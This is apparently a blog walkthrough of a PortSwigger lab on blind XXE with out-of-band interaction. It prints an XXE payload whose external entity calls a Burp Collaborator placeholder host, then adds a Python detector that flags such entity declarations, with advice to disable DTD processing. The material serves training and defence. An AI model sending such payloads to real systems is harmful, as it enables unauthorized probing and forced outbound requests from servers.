Blind XXE with out-of-band interaction
In this post we will walk step by step through how to solve Blind XXE with out-of-band interaction on PortSwigger Academy. This lab's difficulty is Practitioner, and it is the first lab in the XXE injection labs on PortSwigger.
Link to lab: https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction
To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.
To start the lab, click the 'Access the Lab' button. We need a modern browser and Burp Suite Professional Edition to solve this lab, because it requires Burp Collaborator.
As we begin the lab we encounter a shop page showcasing different products. It’s worth noting that the products may differ from the screenshot as PortSwigger Labs can vary the content with each lab session. So, don’t worry if your products look different.
Clicking on one of the products, we can see an image of the product, a description, and the ability to check stock based on location.
Clicking the Check stock button returns a value indicating the number of units.
In the Settings section, make sure the default Collaborator server is selected. This must be set in order to complete the lab.
We will leverage the same payload structure from the first two XXE Injection labs.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Payload [
  <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN">
]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>
The only change we need to make is adding our Burp Collaborator subdomain (http://BURP-COLLABORATOR-SUBDOMAIN) as the SYSTEM identifier of the external entity declared in the DOCTYPE.
In the Collaborator tab, click Poll now to copy the value of the Burp URL.
Our finished payload should resemble this. When we click Send, the response is "XML parsing error".
However, we do get hits in our Collaborator.
This is all we needed to do to solve the lab!
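As an added defensive example (not part of the original post or the lab), the following Python screen inspects a request body before it reaches an XML parser, flags any external entity declared in the DOCTYPE (general or parameter entities, SYSTEM or PUBLIC identifiers), and records the host it would have contacted so the event can be alerted on. The stock-check bodies and the Collaborator subdomain placeholder are constructed samples.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the lab's stock-check request with the external entity
# pointing at a placeholder Collaborator subdomain (not a real host).
XXE_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Payload [
  <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN">
]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"""

# Constructed sample: what a legitimate stock-check body looks like.
BENIGN_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"""

# Matches entity declarations carrying an external identifier, e.g.
#   <!ENTITY name SYSTEM "sysid">
#   <!ENTITY % name PUBLIC "pubid" "sysid">
_ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)\s+
        (?:SYSTEM\s+(?P<sys>"[^"]*"|'[^']*')
          |PUBLIC\s+(?:"[^"]*"|'[^']*')\s+(?P<pub_sys>"[^"]*"|'[^']*'))""",
    re.IGNORECASE | re.VERBOSE,
)

def find_external_entities(xml_text):
    """Return (name, system_id, is_parameter_entity) for every external
    entity declared in the internal DTD subset, without parsing the document."""
    if "<!DOCTYPE" not in xml_text:
        return []
    found = []
    for m in _ENTITY_RE.finditer(xml_text):
        sysid = (m.group("sys") or m.group("pub_sys"))[1:-1]  # strip quotes
        found.append((m.group("name"), sysid, m.group("param") is not None))
    return found

def screen_request_body(xml_text):
    """Decide before parsing: reject any body that declares an external entity
    and return the hosts it would have contacted, for logging and alerting."""
    ents = find_external_entities(xml_text)
    # Non-URL identifiers (e.g. a bare file path) have no hostname; keep them raw.
    hosts = sorted({urlsplit(s).hostname or s for _, s, _ in ents})
    return {"reject": bool(ents), "entities": ents, "hosts": hosts}
```

Treat this as a detection layer only; the real fix is configuring the XML parser to disable DTD processing and external entity resolution.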
That completes the lab! Well done! If you found this helpful, please send me a tweet and tell me what you thought! Feedback is always appreciated!
Jarrod